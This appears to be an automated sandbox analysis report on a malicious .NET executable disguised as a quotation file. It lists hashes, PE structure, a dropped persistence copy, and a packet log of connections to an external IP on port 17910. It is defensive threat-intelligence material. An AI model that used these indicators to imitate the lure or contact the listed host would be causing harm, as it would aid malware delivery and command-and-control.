                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z.b.................R...`.......p... ........@.. ...............................X....@.................................4p..W........]........................................................................... ............... ..H............text....P... ...R.................. ..`.rsrc....].......^...T..............@..@.reloc..............................@..B................pp......H...................0....9...~...........................................r.E.p...,.~,...(....&~)...r.E.p(....~)...r.E.p(....*..(....*..,.~/...(....&~)...r.E.p(....~)...r7F.p(....*..,.~0...(....&~)...r.F.p(....~)...r.F.p(....*2~.....(....*..(....*.*..{....*..{....*:~.......(....*..{....*:~.......(....*..{....*6~......(....*..{....*..{....*..{....*F.(......fef}....*..{....*..(......f.#6....'.A#.....'.A(:...Y(j...a}....*..{....*..{....*.~....(....*..{....*.~....(....*..{....*..{

                                                        C:\Users\user\AppData\Roaming\Data\Data.exe:Zone.Identifier

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:modified
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:true
                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):6.1492798216899756
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        • DOS Executable Generic (2002/1) 0.01%
                                                        File name:QUOTATION 061622.exe
                                                        File size:373760
                                                        MD5:c2c0094c2e70379101d9704808838355
                                                        SHA1:9a492aa61c6f36f17b296c075c26ec6c82c0f72d
                                                        SHA256:3e962de98112837b963063e4db6a41ecfe2d50efc98a5cdf87bcd98fdb1af145
                                                        SHA512:d307d318e6b3482c45a158fbf8b567677fcf46696fd8189d114ae71e03a82dc3cd54228e22966d9cf6a782fb4c206ba8b07e495cb13b177103a2ab7a3e3ba3e1
                                                        SSDEEP:6144:5NcrhNqBJrO21xv5yFdg6Nn4WAw6wPCeZpxK:UrhNMB1VMo6x4WAw6wPp
                                                        TLSH:2284FA2C7B451A76FF1F81744D120A04BBE62F633280A98357EB29CA875F1677F05D8A
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z..b.................R...`.......p... ........@.. ...............................X....@................................

                                                        File Icon

                                                        Icon Hash:c49a0894909c6494

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x45708e
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x62AAEE7A [Thu Jun 16 08:48:58 2022 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                        Entrypoint Preview

                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x570340x57.text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x580000x5dba.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x5e0000xc.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x20000x550940x55200False0.5053918869309838data6.150081957805571IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rsrc0x580000x5dba0x5e00False0.4174285239361702data5.327489257436997IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0x5e0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountry
                                                        AHALF0x59a400xdASCII text, with no line terminatorsEnglishUnited States
                                                        AIFRL0x59a500xdASCII text, with no line terminatorsEnglishUnited States
                                                        AJCFN0x59a600xdASCII text, with no line terminatorsEnglishUnited States
                                                        ALKFK0x59a700xdASCII text, with no line terminatorsEnglishUnited States
                                                        AMOON0x59a800xdASCII text, with no line terminatorsEnglishUnited States
                                                        BMMAM0x59a900xdASCII text, with no line terminatorsEnglishUnited States
                                                        BPKIN0x59aa00xdASCII text, with no line terminatorsEnglishUnited States
                                                        CJDJL0x59ab00xdASCII text, with no line terminatorsEnglishUnited States
                                                        CKHHK0x59ac00xdASCII text, with no line terminatorsEnglishUnited States
                                                        COMLD0x59ad00xdASCII text, with no line terminatorsEnglishUnited States
                                                        CSDHK0x59ae00xdASCII text, with no line terminatorsEnglishUnited States
                                                        CSFDF0x59af00xdASCII text, with no line terminatorsEnglishUnited States
                                                        DAJAD0x59b000xdASCII text, with no line terminatorsEnglishUnited States
                                                        DCKFA0x59b100xdASCII text, with no line terminatorsEnglishUnited States
                                                        DDAAG0x59b200xdASCII text, with no line terminatorsEnglishUnited States
                                                        DGRME0x59b300xdASCII text, with no line terminatorsEnglishUnited States
                                                        DNCRP0x59b400xdASCII text, with no line terminatorsEnglishUnited States
                                                        DSRAC0x59b500xdASCII text, with no line terminatorsEnglishUnited States
                                                        EBNKR0x59b600xdASCII text, with no line terminatorsEnglishUnited States
                                                        EFAMI0x59b700xdASCII text, with no line terminatorsEnglishUnited States
                                                        EFOHI0x59b800xdASCII text, with no line terminatorsEnglishUnited States
                                                        EISNA0x59b900xdASCII text, with no line terminatorsEnglishUnited States
                                                        EMRAH0x59ba00xdASCII text, with no line terminatorsEnglishUnited States
                                                        FAKMN0x59bb00xdASCII text, with no line terminatorsEnglishUnited States
                                                        FBONK0x59bc00xdASCII text, with no line terminatorsEnglishUnited States
                                                        FGKAR0x59bd00xdASCII text, with no line terminatorsEnglishUnited States
                                                        FIFIC0x59be00xdASCII text, with no line terminatorsEnglishUnited States
                                                        FIKCF0x59bf00xdASCII text, with no line terminatorsEnglishUnited States
                                                        FJIMA0x59c000xdASCII text, with no line terminatorsEnglishUnited States
                                                        FOHAP0x59c100xdASCII text, with no line terminatorsEnglishUnited States
                                                        GFRMF0x59c200xdASCII text, with no line terminatorsEnglishUnited States
                                                        GIKAC0x59c300xdASCII text, with no line terminatorsEnglishUnited States
                                                        GSGIC0x59c400xdASCII text, with no line terminatorsEnglishUnited States
                                                        HFAJC0x59c500xdASCII text, with no line terminatorsEnglishUnited States
                                                        HIMMD0x59c600xdASCII text, with no line terminatorsEnglishUnited States
                                                        IBNSM0x59c700xdASCII text, with no line terminatorsEnglishUnited States
                                                        IKSJP0x59c800xdASCII text, with no line terminatorsEnglishUnited States
                                                        IOHAL0x59c900xdASCII text, with no line terminatorsEnglishUnited States
                                                        JBLJD0x59ca00xdASCII text, with no line terminatorsEnglishUnited States
                                                        JHMKP0x59cb00xdASCII text, with no line terminatorsEnglishUnited States
                                                        KBRSP0x59cc00xdASCII text, with no line terminatorsEnglishUnited States
                                                        KFLKA0x59cd00xdASCII text, with no line terminatorsEnglishUnited States
                                                        KPHLD0x59ce00xdASCII text, with no line terminatorsEnglishUnited States
                                                        KSFKM0x59cf00xdASCII text, with no line terminatorsEnglishUnited States
                                                        LDKJK0x59d000xdASCII text, with no line terminatorsEnglishUnited States
                                                        LRKAD0x59d100xdASCII text, with no line terminatorsEnglishUnited States
                                                        MBDNL0x59d200xdASCII text, with no line terminatorsEnglishUnited States
                                                        MDIPI0x59d300xdASCII text, with no line terminatorsEnglishUnited States
                                                        MDJFO0x59d400xdASCII text, with no line terminatorsEnglishUnited States
                                                        MIGEA0x59d500xdASCII text, with no line terminatorsEnglishUnited States
                                                        MLDIB0x59d600xdASCII text, with no line terminatorsEnglishUnited States
                                                        MLHAM0x59d700xdASCII text, with no line terminatorsEnglishUnited States
                                                        MNDFN0x59d800xdASCII text, with no line terminatorsEnglishUnited States
                                                        MRALN0x59d900xdASCII text, with no line terminatorsEnglishUnited States
                                                        MRKLG0x59da00xdASCII text, with no line terminatorsEnglishUnited States
                                                        NDAIL0x59db00xdASCII text, with no line terminatorsEnglishUnited States
                                                        NJDII0x59dc00xdASCII text, with no line terminatorsEnglishUnited States
                                                        ODKED0x59dd00xdASCII text, with no line terminatorsEnglishUnited States
                                                        OMIKM0x59de00xdASCII text, with no line terminatorsEnglishUnited States
                                                        PAECC0x59df00xdASCII text, with no line terminatorsEnglishUnited States
                                                        PIDNA0x59e000xdASCII text, with no line terminatorsEnglishUnited States
                                                        RIMKD0x59e100xdASCII text, with no line terminatorsEnglishUnited States
                                                        RKKPI0x59e200xdASCII text, with no line terminatorsEnglishUnited States
                                                        RLOSF0x59e300xdASCII text, with no line terminatorsEnglishUnited States
                                                        ROFRS0x59e400xdASCII text, with no line terminatorsEnglishUnited States
                                                        RPFPK0x59e500xdASCII text, with no line terminatorsEnglishUnited States
                                                        RRGIF0x59e600xdASCII text, with no line terminatorsEnglishUnited States
                                                        SAABI0x59e700xdASCII text, with no line terminatorsEnglishUnited States
                                                        SELME0x59e800xdASCII text, with no line terminatorsEnglishUnited States
                                                        SIKIF0x59e900xdASCII text, with no line terminatorsEnglishUnited States
                                                        SJIDG0x59ea00xdASCII text, with no line terminatorsEnglishUnited States
                                                        SKGIE0x59eb00xdASCII text, with no line terminatorsEnglishUnited States
                                                        SKIAM0x59ec00xdASCII text, with no line terminatorsEnglishUnited States
                                                        SLEFD0x59ed00xdASCII text, with no line terminatorsEnglishUnited States
                                                        SNIAS0x59ee00xdASCII text, with no line terminatorsEnglishUnited States
                                                        RT_ICON0x59ef00x468GLS_BINARY_LSB_FIRST
                                                        RT_ICON0x5a3580x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 1134929317, next used block 44344484
                                                        RT_ICON0x5b4000x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
                                                        RT_GROUP_ICON0x5d9a80x30data
                                                        RT_VERSION0x5d9d80x1f8dataEnglishUnited States
                                                        RT_MANIFEST0x5dbd00x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                        Imports

                                                        DLLImport
                                                        mscoree.dll_CorExeMain

                                                        Possible Origin

                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishUnited States

                                                        Network Behavior

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jun 16, 2022 14:43:07.187585115 CEST4978017910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:07.210748911 CEST1791049780185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:07.210872889 CEST4978017910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:07.412843943 CEST4978017910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:07.436301947 CEST1791049780185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:07.436861038 CEST4978017910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:07.461302042 CEST1791049780185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:07.585809946 CEST4978017910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:14.662225962 CEST4978017910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:14.686064959 CEST1791049780185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:14.686599016 CEST4978017910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:14.732625008 CEST1791049780185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:14.732676029 CEST1791049780185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:14.732717037 CEST1791049780185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:14.732728004 CEST4978017910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:14.732789040 CEST1791049780185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:14.732867002 CEST4978017910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.199846029 CEST4978017910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.201071978 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.224704027 CEST1791049780185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.224744081 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.224874973 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.225850105 CEST4978017910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.228127003 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.252454042 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.254559040 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.277751923 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.277791023 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.277971983 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.301623106 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.301640987 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.301969051 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.324974060 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.324991941 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.325248957 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.325371027 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.325515985 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.348668098 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.348700047 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.348728895 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.348756075 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.348844051 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.348958969 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.349174976 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.349208117 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.349232912 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.349282980 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.349322081 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.372128963 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.372167110 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.372236967 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.372257948 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.372266054 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.372387886 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.372391939 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.372421026 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.372679949 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.372796059 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.372812033 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.372994900 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.373131990 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.373230934 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.373318911 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.373434067 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.373549938 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.373632908 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.373718977 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.395391941 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.395410061 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.395417929 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.395428896 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.395492077 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.395695925 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.395807028 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.395895958 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.395910025 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.396020889 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.396087885 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.396217108 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.396334887 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.396337986 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.396464109 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.396557093 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.396625042 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.396732092 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.396811962 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.396903992 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.396986008 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.397072077 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.397150040 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.397211075 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.397309065 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.397392988 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.418986082 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.419023037 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.419049025 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.419074059 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.419303894 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.419441938 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.419454098 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.419569969 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.419574022 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.419656992 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.419946909 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.421585083 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.442555904 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.442591906 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.442651033 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.442702055 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.442789078 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.442837000 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.444186926 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.444331884 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.444402933 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.444490910 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.444509029 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.444700003 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.445291996 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.445395947 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.445586920 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.446669102 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.466172934 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.466442108 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.466902018 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.467020988 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.467926025 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.467953920 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.468103886 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.468175888 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.468400002 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.468425035 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.468523026 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.468616009 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.469127893 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.469160080 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.469191074 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.469284058 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.469342947 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.469439030 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.469577074 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.469877958 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.469981909 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.470273018 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.470307112 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.470397949 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.470462084 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.470904112 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.489262104 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.489413977 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.489448071 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.489593029 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.489716053 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.489840031 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.490622997 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.490748882 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.491091967 CEST1791049849185.222.58.90192.168.2.5
